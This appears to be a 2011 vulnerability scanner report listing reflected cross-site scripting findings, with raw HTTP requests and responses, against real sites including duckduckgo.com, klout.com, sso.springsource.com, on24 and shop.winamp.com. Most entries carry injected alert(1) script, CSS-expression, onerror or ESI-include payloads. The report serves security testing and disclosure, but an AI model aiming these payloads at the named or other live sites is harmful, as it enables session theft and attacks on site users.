| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /iq/v1/twitter/cloudscan |
| GET /iq/v1/twitter/cloudscan Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:01:10 GMT Content-Type: application/json; charset=utf-8 Connection: keep-alive X-Mashery-Responder: proxyworker-eu-i-cd6d64b9 Etag: "c1f1907da906622eeb6 Cache-Control: max-age=0, private, must-revalidate X-Frame-Options: DENY Set-Cookie: _qwerly_session X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.009354 Accept-Ranges: bytes Content-Length: 380 nrqwc0e0f<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /iq/v1/twitter/cloudscan |
| GET /iq/v1/twitter/cloudscan Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:01:59 GMT Content-Type: application/json; charset=utf-8 Connection: keep-alive X-Mashery-Responder: proxyworker-eu-i-b76f66c3 Etag: "5d6aa27ef217e228a9d Cache-Control: max-age=0, private, must-revalidate X-Frame-Options: DENY Set-Cookie: _qwerly_session X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.010260 Accept-Ranges: bytes Content-Length: 380 nrqw({"services":[{"type" |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://duckduckgo.com |
| Path: | /e.js |
| GET /e.js?from=h02332%40gmail Host: duckduckgo.com Connection: keep-alive Referer: http://duckduckgo.com Cache-Control: max-age=0 Origin: http://duckduckgo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: r=b; _qwerly_session |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:17:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Expires: Sun, 12 Nov 1999 20:28:05 GMT Content-Length: 1425 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <a href="b22ea"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://event.on24.com |
| Path: | /eventRegistration |
| GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:29:57 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=rTgXMMJ19 X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="key" value="453849B62CAB5 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://event.on24.com |
| Path: | /eventRegistration |
| GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:08 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=7cDI022cg X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="partnerref" value="ocom99c8f"><x style=x:expression(alert ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://event.on24.com |
| Path: | /eventRegistration |
| GET /eventRegistration Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:17 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=62BqOkDMb X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close <!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="sourcepage" value="registerab0db"><x style=x:expression(alert ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fonts.googleapis |
| Path: | /css |
| GET /css?family=Droid+Sansdf90e<script>alert(1)< Host: fonts.googleapis.com Proxy-Connection: keep-alive Referer: http://www.ubermedia.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: text/css; charset=UTF-8 Expires: Tue, 01 Mar 2011 13:16:19 GMT Date: Tue, 01 Mar 2011 13:16:19 GMT Cache-Control: private, max-age=86400 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 124 /* Droid Sansdf90e<script>alert(1)< /* Not supported. */ |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://init.zopim.com |
| Path: | /register |
| GET /register?swfVer=2371&sk Host: init.zopim.com Proxy-Connection: keep-alive Referer: http://zopim.com/swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Sat, 26 Feb 2011 20:42:18 GMT Connection: keep-alive Content-Length: 856 {"status": "offline", "__status": "ok", "name": "Visitor 210780399", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment ...[SNIP]... Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZ |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://klout.com |
| Path: | / |
| GET /?4facd"><script>alert(1)< Host: klout.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 02:08:00 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: arrival_cookie=94677 Vary: Accept-Encoding,User Content-Type: text/html; charset=utf-8 Content-Length: 20038 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>The Standard for ...[SNIP]... <a id="signup_button" href="/auth/login?prev ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://klout.com |
| Path: | /business |
| GET /business?1d94c"><script>alert(1)< Host: klout.com Proxy-Connection: keep-alive Referer: http://klout.com/blog Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-1165085945 |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 13:16:21 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Vary: Accept-Encoding,User Content-Type: text/html; charset=utf-8 Content-Length: 10252 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Leverage the Pow ...[SNIP]... <a href="/auth/login?prev ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://klout.com |
| Path: | /perks |
| GET /perks?192f9"><script>alert(1)< Host: klout.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-1165085945 |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 13:19:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Vary: Accept-Encoding,User Content-Type: text/html; charset=utf-8 Content-Length: 8775 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Klout Perks</tit ...[SNIP]... <a href="/auth/login?prev ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://lfov.net |
| Path: | /webrecorder/g/chimera.js |
| GET /webrecorder/g/chimera.js Host: lfov.net Proxy-Connection: keep-alive Referer: http://webcontent Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Coyote-2-405e0b67 |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat Set-Cookie: LOOPFUSE="nulla35d3<img src=a onerror=alert(1) Content-Length: 62 Date: Sat, 26 Feb 2011 23:20:13 GMT Set-Cookie: Coyote-2-405e0b67 _lf_vid='nulla35d3<img src=a onerror=alert(1) |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://login.silverlight |
| Path: | /login/signin.aspx |
| GET /login/signin.aspx Accept: text/html, application/xhtml+xml, */* Referer: https://login.silverlight Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: login.silverlight.net Connection: Keep-Alive Cache-Control: no-cache Cookie: omniID=1296343609010_276c |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Tue, 01 Mar 2011 03:42:10 GMT Content-Length: 15573 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> The Of ...[SNIP]... <a href="https://login ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://login.silverlight |
| Path: | /login/signin.aspx |
| GET /login/signin.aspx Host: login.silverlight.net Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Tue, 01 Mar 2011 03:36:53 GMT Content-Length: 13338 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> Sign I ...[SNIP]... <a href="https://login ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://odb.outbrain.com |
| Path: | /utils/get |
| GET /utils/get?url=http%3A%2F Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://ioerror.us/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: obuid=0e0ed3f9-f76f-4651 |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-cache Pragma: no-cache Set-Cookie: tick=1298762384782; Domain=.outbrain.com; Path=/ P3P: policyref="http://www Set-Cookie: _lvs2="7/zvT3TaXCJmX Set-Cookie: _lvd2=p47tkLgO+tfGFc Set-Cookie: _rcc2="c5YqA63GvjSl Set-Cookie: recs-74e9af2a662553e Content-Type: text/x-json;charset=UTF-8 Vary: Accept-Encoding Date: Sat, 26 Feb 2011 23:19:44 GMT Content-Length: 2920 outbrain_rater.retur ...[SNIP]... <\/span>','raterMode': |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://plancast.com |
| Path: | /p/3zbp |
| GET /p/3zbp720bc"><script>alert(1)< Host: plancast.com Proxy-Connection: keep-alive Referer: http://klout.com/blog/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Server: nginx/0.6.32 Date: Tue, 01 Mar 2011 14:12:30 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: plancast=e909fb2ae05 Content-Length: 19150 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xml:lang="en" lang="en" xmlns="http://www.w3.org <head> ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://pubads.g |
| Path: | /gampad/ads |
| GET /gampad/ads?correlator Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.adexchanger Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=c708f553300004b|578176 |
| HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 01 Mar 2011 13:23:38 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 1449 GA_googleSetAdConten ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://rapportive.com |
| Path: | /stylesheets/jquery |
| GET /stylesheets/jquery Host: rapportive.com Proxy-Connection: keep-alive Referer: http://rapportive.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _relascale_session |
| HTTP/1.1 404 Not Found Server: nginx/0.7.67 Date: Tue, 01 Mar 2011 13:16:13 GMT Content-Type: text/plain Connection: keep-alive Content-Length: 96 X-Varnish: 2027515278 Age: 0 Via: 1.1 varnish File not found: /stylesheets/jquery |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://rapportive.com |
| Path: | /stylesheets/website |
| GET /stylesheets/website Host: rapportive.com Proxy-Connection: keep-alive Referer: http://rapportive.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _relascale_session |
| HTTP/1.1 404 Not Found Server: nginx/0.7.67 Date: Tue, 01 Mar 2011 13:16:14 GMT Content-Type: text/plain Connection: keep-alive Content-Length: 88 X-Varnish: 2027515420 Age: 0 Via: 1.1 varnish File not found: /stylesheets/website |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://shop.winamp.com |
| Path: | /DRHM/store |
| GET /DRHM/store?Action Host: shop.winamp.com Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:17 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 14076 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?94384-->4321560c01e=1&Action=DisplayESIPage ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://shop.winamp.com |
| Path: | /store |
| GET /store?Action=DisplayPage Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Sun, 27 Feb 2011 17:47:47 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 101351 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?741fc-->4ffb80c87d5=1&Action=DisplayESIPage ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://sso.springsource |
| Path: | /cas/CSS/style-local.css |
| GET /cas/CSS/style-local.css?95a9b--><script>alert(1)< Host: sso.springsource.com Connection: keep-alive Referer: https://sso.springsource Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=7C9BC5242 |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 15:06:37 GMT Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 6218 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>CAS  ...[SNIP]... <a href="login?95a9b--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://sso.springsource |
| Path: | /cas/login |
| GET /cas/login?38852--><script>alert(1)< Host: sso.springsource.com Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=33AC2E0E7 |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 15:05:50 GMT Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: JSESSIONID=677EA4F31 Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 6218 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>CAS  ...[SNIP]... <a href="login?38852--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://storify.com |
| Path: | /klout/contest-winners |
| GET /klout/contest-winners Host: storify.com Proxy-Connection: keep-alive Referer: http://klout.com/blog/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _sess=eyJpZCI6ImU5Mj |
| HTTP/1.1 200 OK Cache-Control: public, max-age=100 Content-Type: application/json Content-Length: 26197 Date: Tue, 01 Mar 2011 14:12:37 GMT X-Varnish: 634703163 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS cbcontestwinnershowd "editors": null, "topics": null, "published_at": 1297465279, "permalink": "http://storify.com/klout "shorturl": "http://sfy.c ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://storify.com |
| Path: | /klout/contest-winners |
| GET /klout/contest-winners Host: storify.com Proxy-Connection: keep-alive Referer: http://klout.com/blog/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _sess=eyJpZCI6ImU5Mj |
| HTTP/1.1 200 OK Content-Type: application/json Set-Cookie: _sess=eyJpZCI6ImU5Mj Content-Length: 77 Date: Tue, 01 Mar 2011 14:12:33 GMT X-Varnish: 634703140 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS jsonp12989872239602281e<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://REDACTED |
| Path: | /CNT/iview/302784236 |
| GET /CNT/iview/302784236 Host: REDACTED Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MUID=FA3AE6176FAC441 |
| HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/html Expires: 0 Vary: Accept-Encoding X-Powered-By: ASP.NET Date: Sun, 27 Feb 2011 02:31:24 GMT Connection: close Content-Length: 597 <body style=margin:0><a target=_blank href="http://clk.atdmt ...[SNIP]... 2011%2F02%2F16%2Fforbes ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://widgets.digg.com |
| Path: | /buttons/count |
| GET /buttons/count?url=http Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://techcrunch.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Age: 0 Date: Sun, 27 Feb 2011 02:33:09 GMT Via: NS-CACHE: 100 Etag: "d22d498f927e3a9e446 Content-Length: 116 Server: TornadoServer/0.1 Content-Type: application/json Accept-Ranges: bytes Cache-Control: private, max-age=599 Expires: Sun, 27 Feb 2011 02:43:08 GMT X-CDN: Cotendo Connection: Keep-Alive __DBW.collectDiggs({"url" |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.business |
| Path: | /top-10-web-content |
| GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=tn6mr2tkpg Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.business |
| Path: | /top-10-web-content |
| GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=tf092k3rbi Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.business |
| Path: | /top-10-web-content |
| GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
